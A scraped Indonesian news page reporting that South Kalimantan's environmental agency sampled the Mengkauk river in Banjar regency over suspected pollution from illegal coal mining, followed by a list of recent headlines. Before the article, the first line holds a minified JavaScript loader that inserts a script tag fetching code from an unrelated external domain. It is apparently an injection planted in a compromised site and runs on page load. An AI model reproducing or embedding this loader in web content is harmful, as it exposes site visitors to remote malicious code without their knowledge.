(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

Diduga Air Sungai Mengkauk Tercemar, Sampel Air Dibawa ke Lab


KANALKALIMANTAN.COM, MARTAPURA – Aktivitas pertambangan tanpa izin (Peti) di wilayah desa Remo, Kecamatan Peramasan, Kabupaten Banjar diduga mencemari aliran sungai Mengkauk.

Adanya dugaan tersebut membuat Dinas Lingkungan Hidup (DLH) Provinsi Kalsel langsung turun lapangan mengambil sampel air di sungai Mengkauk, guna mengetahui tingkat pencemaran air.

Pengambilan sampel air sungai ini dilakukan langsung Kepala DLH Provinsi Kalsel Hanifah Dwi Nirwana didampingi Kepala DLH Kabupaten Banjar Boyke W Tristiyanto, serta perwakilan PT Antang Gunung Meratus.

Hanifah Dwi Nirwana mengatakan, Dinas Lingkungan Hidup Kalsel turun ke lapangan untuk mengetahui dampak dugaan pertambangan tanpa izin (Peti) batu bara di lokasi tersebut.

 

Ada tiga titik lokasi yang diambil sampel airnya, di bagian hulu sungai, tengah dan di dekat permukiman warga. Untuk kemudian sampel-sampel tersebut dibawa ke laboratorium untuk diuji.

“Nanti jika hasil pengujian sampel air menunjukan telah terjadi pencemaran, maka akan diambil langkah yang tegas sesuai aturan dan perundangan yang berlaku,” tegasnya, Selasa (29/12/2020).

Untuk penanganan pertambangan liar atau illegal mining, ujar Hanifah, pihaknya akan bekerja sama dengan DLH Kabupaten Banjar, Balai Wilayah Sungai (BWS) Kalimantan II.

Dinas LH Kalsel turun lapangan mengambil sampel air di sungai Mangkauk, Selasa (29/12/2020). Foto: ist

Selanjutnya melakukan koordinasi dengan PT Antang Gunung Meratus sebagai pemilik konsesi pertambangan, dan dengan semua pemangku kepentingan (stakeholder) serta Kementerian ESDM.

“Persoalan ini harus segera diambil tindakan nyata untuk menyelamatkan lingkungan, jika terbukti merusak lingkungan dan pencemaran air,” tandasnya.

Sementara itu, perwakilan dari PT Antang Gunung Meratus, Suhardi mengatakan, sebagai pemilik konsesi pertambangan di wilayah Remo, pihaknya sudah melakukan pelaporan ke Polres Banjar terkait dugaan pertambangan liar atau Peti.

“Informasi di Polres berdasarkan penyampaian surat bahwa dugaan aktivitas tersebut masih dalam tahap penyelidikan oleh tim penyidik Polres Banjar,” ungkap Suhardi.

Pihaknya juga sudah menyerahkan bukti dan terus mengumpulkan bukti tambahan. Selain itu tim penyidik Tipikor sudah menyampaikan sudah melakukan pemanggilan dua kali terhadap pihak yang diduga melakukan Peti.

Suhardi menduga, aliran sungai yang berada di desa Remo ini diperkirakan tercemar akibat pertambangan lilar. Aliran air dari Peti tersebut diduga langsung mengalir ke sungai yang ada di desa Remo. Perambangan tanpa izin ini selalu berpindah tempat, namun di lokasi yang ada ini masih terlihat penumpukan batu bara. Hal ini menjadi salah satu bukti masih ada peti terjadi di lokasi konsesi milik PT Antang Gunung Meratus. (kanalkalimantan.com/bie)

Reporter : bie
Editor : kk

Al Ghifari

Recent Posts

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

2 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

5 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

6 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

8 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

8 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

9 jam ago

This website uses cookies.